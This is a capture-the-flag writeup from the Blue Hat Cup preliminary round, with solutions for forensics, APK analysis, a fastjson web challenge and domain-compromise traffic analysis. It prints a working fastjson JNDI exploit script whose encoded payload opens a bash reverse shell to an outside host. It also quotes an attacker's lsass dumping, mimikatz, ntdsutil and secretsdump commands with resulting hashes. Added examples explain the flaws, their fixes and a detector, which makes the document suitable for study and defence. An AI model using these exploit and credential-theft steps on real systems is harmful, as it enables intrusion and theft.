WP - 蓝帽 (Blue Hat Cup) - Preliminary Round
Team: 糖醋排骨
Members: Tutu, lgz, guangfa
Forensics
Mobile forensics 1
After exporting the image with Pangu Cloud (盘古云), the value is found directly.
flag: 360x360
Mobile forensics 2
A direct search finds it.
flag: SF1142358694796
Computer forensics 1
Run hashdump, then crack the MD5.
Computer forensics 2
Use pstree to inspect the process tree.
flag: 2192
Computer forensics 3
Forensic Master (取证大师) locates the key file, but the office documents do not seem to turn up that way.
A PPT was found and exported; it is password-protected, so it was decrypted with Passware Kit.
flag: flag{b27867b66866866686866883bb43536}
Computer forensics 4
A TrueCrypt-encrypted file was found in G.E01.
Using Forensic Master's memory tool, the TrueCrypt key was recovered from the dmp file and the container decrypted.
Inside was an encrypted archive; it was exported and brute-forced (password 991314), and extracting it gives the flag.
Program analysis 1
Opening the APK in AndroidKiller gives the package name directly: exec.azj.kny.d.c
Program analysis 2
Opening the APK in AndroidKiller gives the entry point directly: minmtta.hemjcbm.ahibyws.MainActivity
Program analysis 3
Decompile; the server address is in MainActivity as base64 ciphertext.
Program analysis 4
MainActivity calls d.a.a.h; stepping into it shows the security-check function is d.a.a.c.a.a(), so the flag is a
Website forensics 1
The task asks us to find the web shell (木马); searching turns it up:
lanmaobei666
Website forensics 2
Follow the shell into its code:
<?php
function my_encrypt(){
$str = 'P3LMJ4uCbkFJ/RarywrCvA==';
$str = str_replace(array("/r/n", "/r", "/n"), "", $str);
$key = 'PanGuShi';
$iv = substr(sha1($key),0,16);
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
mcrypt_generic_init($td, "PanGuShi", $iv);
$decode = base64_decode($str);
$dencrypted = mdecrypt_generic($td, $decode);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$dencrypted = trim($dencrypted);
echo $dencrypted;
return $dencrypted;
}
my_encrypt();
Running it gives the string KBLT123.
flag: KBLT123
Website forensics 3
Follow it the same way.
flag: jyzg123456
Website forensics 4
Set up the database. Export the amounts and times of the transfers from 张宝 (id 3) to 王子豪 (id 5) into order.txt, then pull out the amount and time fields:
f = open("order.txt", "r").readlines()
m = open("m.txt", "w")   # amounts (still obfuscated)
t = open("t.txt", "w")   # hour of each transfer
for line in f:
    fields = line.strip().split()
    # keep only the rows whose payee/payer ids are 5 and 3
    if fields[-3] == '5,' and fields[-2] == '3,':
        hour = fields[-5][-2:]
        # the fee table below only covers hours 2..18
        if 2 <= int(hour) < 19:
            t.write(hour + "\n")
            m.write(fields[-1][1:-3] + "\n")   # strip the surrounding SQL quoting
m.close()
t.close()
Then compute the total:
from hashlib import md5
import base64

# the obfuscation key is the first 6 hex characters of md5('jyzg123456')
key = md5(b'jyzg123456').hexdigest()
char = key[:6]   # 'cd9d86'
# fee rate by hour: index 0 is hour 2, index 16 is hour 18
transfer_price = [0.04, 0.06, 0.05, 0.07, 0.10, 0.15, 0.17, 0.23,
                  0.22, 0.25, 0.29, 0.20, 0.28, 0.33, 0.35, 0.35, 0.37]
amounts = open("m.txt", "r").readlines()
hours = open("t.txt", "r").readlines()
total = 0
for i, ii in zip(amounts, hours):
    s = base64.b64decode(i.strip("\n"))
    # each of the first 6 bytes is the plaintext character plus the key character, mod 256
    data = ""
    for j in range(6):
        data += chr((s[j] - ord(char[j])) % 256)
    total += float(data) * transfer_price[int(ii) - 2]
print(total)
web
Ez_gadget
fastjson 1.2.62. The key code:
@ResponseBody
@RequestMapping({"/json"})
public String Unserjson(@RequestParam String str, @RequestParam String input) throws Exception {
    if (str != null &&
        Objects.hashCode(str) == secret.getKey().hashCode() && !secret.getKey().equals(str)) {
        String pattern = ".*rmi.*|.*jndi.*|.*ldap.*|.*\\\\x.*";
        Pattern p = Pattern.compile(pattern, 2);
        boolean StrMatch = p.matcher(input).matches();
        if (StrMatch)
            return "Hacker get out!!!";
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        JSON.parseObject(input);
    }
    return "hello";
}
The gate wants a str whose hashCode equals the key's but which is not the key itself, so brute-force a suitable str:
public class fun {
    public static void main(String[] args) {
        String key = "tgVmFB4iKr7ElclK";
        for (long i = 0; i < 1000000000000L; i++) {
            if (Long.toHexString(i).hashCode() == key.hashCode())
                System.out.println(Long.toHexString(i));
        }
    }
}
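An added example, not from the writeup or the challenge source, of why this gate is no protection at all: Java's String.hashCode is a linear sum reduced mod 2^32, so a second string with the same hash can be constructed in a single pass instead of brute-forced. The key tgVmFB4iKr7ElclK is the one above; java_string_hash, collide, weak_gate and hardened_gate are names chosen here, and hardened_gate is an assumed fix (compare the secret itself, in constant time), not the challenge's code.

```python
# Added example (not from the writeup): a hashCode() equality test is not an
# authentication check. java.lang.String.hashCode is
#     h = sum(c[i] * 31^(n-1-i))  as a signed 32-bit int,
# so raising one character by 1 and lowering its right-hand neighbour by 31
# leaves h unchanged: c[i]*31 + c[i+1] == (c[i]+1)*31 + (c[i+1]-31).
import hmac

KEY = "tgVmFB4iKr7ElclK"  # the key from the challenge source


def java_string_hash(s: str) -> int:
    """Reproduce java.lang.String.hashCode(), including signed 32-bit wraparound."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & 0xFFFFFFFF
    # Java ints are signed: values >= 2^31 are negative.
    return h - 0x100000000 if h >= 0x80000000 else h


def collide(s: str) -> str:
    """Return a printable ASCII string != s with the same Java hashCode (O(n))."""
    chars = list(s)
    for i in range(len(chars) - 1):
        a, b = ord(chars[i]) + 1, ord(chars[i + 1]) - 31
        if 0x21 <= a <= 0x7E and 0x21 <= b <= 0x7E:  # keep both printable
            chars[i], chars[i + 1] = chr(a), chr(b)
            return "".join(chars)
    raise ValueError("no printable collision at any position")


def weak_gate(candidate: str, key: str = KEY) -> bool:
    """The challenge's logic: passes for any collision that is not the key itself."""
    return (java_string_hash(candidate) == java_string_hash(key)
            and candidate != key)


def hardened_gate(candidate: str, key: str = KEY) -> bool:
    """Assumed fix: compare the secret itself in constant time; hashCode plays no part."""
    return hmac.compare_digest(candidate.encode(), key.encode())


if __name__ == "__main__":
    forged = collide(KEY)
    print(forged, weak_gate(forged), hardened_gate(forged))
```

The constructive collision shows that the only thing the hashCode comparison guarantees is that an attacker who knows the key (or its hash) needs a few microseconds rather than a few billion iterations; a check built on hashCode leaks nothing about whether the caller actually holds the secret.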
Direct JNDI injection is caught by the filter:
?str=132e8d2c8&input=%7B%22%40type%22%3A%22org.apache.xbean.propertyeditor.JndiConverter%22%2C%22AsText%22%3A%22ldap%3A%2F%2F39.102.128.224%3A1389%2Fvgujix%22%7D
Bypass it with a newline (\n): the flag value 2 passed to Pattern.compile is CASE_INSENSITIVE only, DOTALL is not set, so `.` does not match a line break and matches(), which must cover the whole input, fails as soon as the input contains one.
import requests
url="http://eci-2ze4ml85yqv2cxmjftag.cloudeci1.ichunqiu.com:8888/json?str=132e8d2c8&input="
payload=u'{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"\nldap://39.102.128.224:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC8zOS4xMDIuMTI4LjIyNC85OTk3ICAwPiYx"}'
res = requests.get(url+payload)
print(res.text)
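The filter's semantics reproduced in Python so the bypass and the fix can be run side by side; this is an added example, not code from the writeup or the challenge. Java's Pattern.compile(p, 2) is CASE_INSENSITIVE, matcher().matches() requires the whole input to match, and `.` does not match `\n` without DOTALL; Python's re.fullmatch with re.IGNORECASE behaves the same way. The JndiConverter inputs below are constructed to mirror the two requests above, with a placeholder LDAP host instead of the address from the writeup.

```python
# Added example (not from the writeup): the deployed denylist, the newline
# bypass, and two ways the regex check would have had to be written to hold.
import re

PATTERN = r".*rmi.*|.*jndi.*|.*ldap.*|.*\\x.*"   # the challenge's denylist

# Constructed inputs shaped like the writeup's two requests (placeholder host).
DIRECT = ('{"@type":"org.apache.xbean.propertyeditor.JndiConverter",'
          '"AsText":"ldap://placeholder.invalid/x"}')
NEWLINE = ('{"@type":"org.apache.xbean.propertyeditor.JndiConverter",'
           '"AsText":"\nldap://placeholder.invalid/x"}')


def filter_as_deployed(data: str) -> bool:
    """True when blocked. Mirrors Pattern.compile(p, 2) + matcher(data).matches()."""
    return re.fullmatch(PATTERN, data, re.IGNORECASE) is not None


def filter_with_dotall(data: str) -> bool:
    """Same denylist, but '.' now spans line breaks (Pattern.DOTALL in Java)."""
    return re.fullmatch(PATTERN, data, re.IGNORECASE | re.DOTALL) is not None


def filter_with_search(data: str) -> bool:
    """Drop the '.*' anchors and use a substring search (Matcher.find() in Java)."""
    return re.search(r"rmi|jndi|ldap|\\x", data, re.IGNORECASE) is not None


if __name__ == "__main__":
    for name, data in (("direct", DIRECT), ("newline", NEWLINE)):
        print(name, filter_as_deployed(data), filter_with_dotall(data),
              filter_with_search(data))
```

Either fix closes the newline hole, but a denylist over the serialized text stays brittle: the durable mitigation is to never call setAutoTypeSupport(true) on untrusted input and, on fastjson 1.2.68 or later, to enable safeMode, which turns autoType off entirely.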
The listener on our server received the shell, but this user could not read /root.
Check for SUID binaries:
find / -user root -perm -4000 -print 2>/dev/null
Read the flag with date.
flag: flag{6bc5ad16-290c-462f-88c5-1f7f6b2d4f31}
misc
domainhacker
The capture is small enough to read stream by stream. Start with 1.php: the executed command is carried in the variable q8fb9d4c082c11; drop its first two characters and base64-decode the rest.
cd /d "C:/phpstudy_pro/WWW"&whoami /priv&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "C:\\phpstudy_pro\\WWW"&powershell -c "whoami /priv"&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "C:\\phpstudy_pro\\WWW"&tasklist&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "C:\\phpstudy_pro\\WWW"&powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 476 C:\windows\temp\lsass.dmp full"&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "C:\\phpstudy_pro\\WWW"&cd c:\windows\temp\&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&dir&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&dir&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&move 1.rar c:\phpstudy_pro\www\&echo efa923ba504&cd&echo 1a4be8815ef8
The attacker dumped lsass with comsvcs.dll, read the hashes out of the dump with mimikatz, and packed the result into 1.rar with the password SecretsPassw0rds. Extract 1.rar from the last stream and unpack it; the NTLM entry is the flag.
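A small detector for the web-shell traffic pattern described above, added here as an example and not part of the writeup. The shell carries its command in a POST parameter (q8fb9d4c082c11, as in the capture), prefixed with two characters before the base64. The sample bodies are constructed by encoding commands quoted above; the two-character prefix "xx" and the indicator list are assumptions about what the shell sends and what a defender would alert on.

```python
# Added example (not from the writeup): decode the shell's command parameter and
# flag the credential-theft steps seen in the capture.
import base64
from urllib.parse import parse_qs, urlencode

PARAM = "q8fb9d4c082c11"   # parameter name observed in the capture

# Indicators (assumed): LSASS dump via comsvcs.dll, mimikatz reading a
# minidump, and archiving with a password before exfiltration.
INDICATORS = {
    "lsass_dump_comsvcs": ("comsvcs.dll", "minidump"),
    "mimikatz": ("sekurlsa::",),
    "password_archive": ("rar.exe a -p",),
}


def encode_body(command: str, junk: str = "xx") -> str:
    """Build a POST body the way the shell does (constructed; the junk prefix is arbitrary)."""
    b64 = base64.b64encode(command.encode()).decode()
    return urlencode({PARAM: junk + b64})


def decode_command(body: str) -> str:
    """Recover the command: take the parameter, drop two leading characters, base64-decode."""
    value = parse_qs(body)[PARAM][0]
    return base64.b64decode(value[2:]).decode(errors="replace")


def classify(command: str) -> list:
    """Names of the indicators present in the command (case-insensitive)."""
    lowered = command.lower()
    return [name for name, needles in INDICATORS.items()
            if all(n in lowered for n in needles)]


# Constructed sample traffic: commands from the writeup, wrapped as the shell sends them.
SAMPLE_BODIES = [
    encode_body('cd /d "C:\\\\phpstudy_pro\\\\WWW"&tasklist&echo efa923ba504&cd&echo 1a4be8815ef8'),
    encode_body('cd /d "C:\\\\phpstudy_pro\\\\WWW"&powershell -c "rundll32 C:\\windows\\system32\\comsvcs.dll,'
                ' MiniDump 476 C:\\windows\\temp\\lsass.dmp full"&echo efa923ba504&cd&echo 1a4be8815ef8'),
    encode_body('cd /d "c:\\\\Windows\\\\Temp"&mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp"'
                ' "sekurlsa::logonpasswords" "exit" > 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8'),
    encode_body('cd /d "c:\\\\Windows\\\\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8'),
]


def scan(bodies=SAMPLE_BODIES) -> list:
    """Decode every body; return (command, indicators) for those that trip an indicator."""
    hits = []
    for body in bodies:
        cmd = decode_command(body)
        found = classify(cmd)
        if found:
            hits.append((cmd, found))
    return hits


if __name__ == "__main__":
    for cmd, found in scan():
        print(found, cmd[:80])
```

Run against a real capture, the same decoder applied to every POST to 1.php reconstructs the operator's session in order, which is exactly how the archive password was recovered above.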
domainhacker2
Same approach as domainhacker1. Among the commands run through 1.php, the archive password is FakePassword123$; extracting the archive yields the ntds file together with the matching system and security hives.
cd /d "C:\\phpstudy_pro\\WWW"&dsquery computer&echo 1d3632&cd&echo 78bc462ab
cd /d "C:\\phpstudy_pro\\WWW"&hostname&echo 1d3632&cd&echo 78bc462ab
C:/phpstudy_pro/WWW/log.txt
C:/phpstudy_pro/WWW/
C:/phpstudy_pro/WWW/log.txt
C:/phpstudy_pro/WWW/log.txt
ac i ntds
ifm
create full c:\windows\temp\new
q
q
C:/phpstudy_pro/WWW/
cd /d "C:\\phpstudy_pro\\WWW"&cmd.exe /c ntdsutil.exe < log.txt >err.txt 2>&1&echo 1d3632&cd&echo 78bc462ab
cd /d "C:\\phpstudy_pro\\WWW"&dir &echo 1d3632&cd&echo 78bc462ab
cd /d "C:\\phpstudy_pro\\WWW"&type err.txt&echo 1d3632&cd&echo 78bc462ab
cd /d "C:\\phpstudy_pro\\WWW"&cd c:\windows\temp\&echo 1d3632&cd&echo 78bc462ab
cd /d "c:\\Windows\\Temp"&dir&echo 1d3632&cd&echo 78bc462ab
C:/windows/temp/Rar.exe
cd /d "c:\\Windows\\Temp"&rar.exe a -PFakePassword123$ ntds.rar new&echo 1d3632&cd&echo 78bc462ab
cd /d "c:\\Windows\\Temp"&dir&echo 1d3632&cd&echo 78bc462ab
cd /d "c:\\Windows\\Temp"&move ntds.rar c:\phpstudy_pro\www\&echo 1d3632&cd&echo 78bc462ab
Extract the password hashes, including history, with secretsdump:
python .\secretsdump.py -ntds ntds.dit -security security -system system -history local
This gives the Administrator hashes:
test.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a85016dddda9fe5a980272af8f54f20e:::
test.local\Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:07ab403ab740c1540c378b0f5aaa4087:::
test.local\Administrator_history1:500:aad3b435b51404eeaad3b435b51404ee:34e92e3e4267aa7055a284d9ece2a3ee:::
test.local\Administrator_history2:500:aad3b435b51404eeaad3b435b51404ee:34e92e3e4267aa7055a284d9ece2a3ee:::
The history0 NT hash is the flag.
hacked by whoami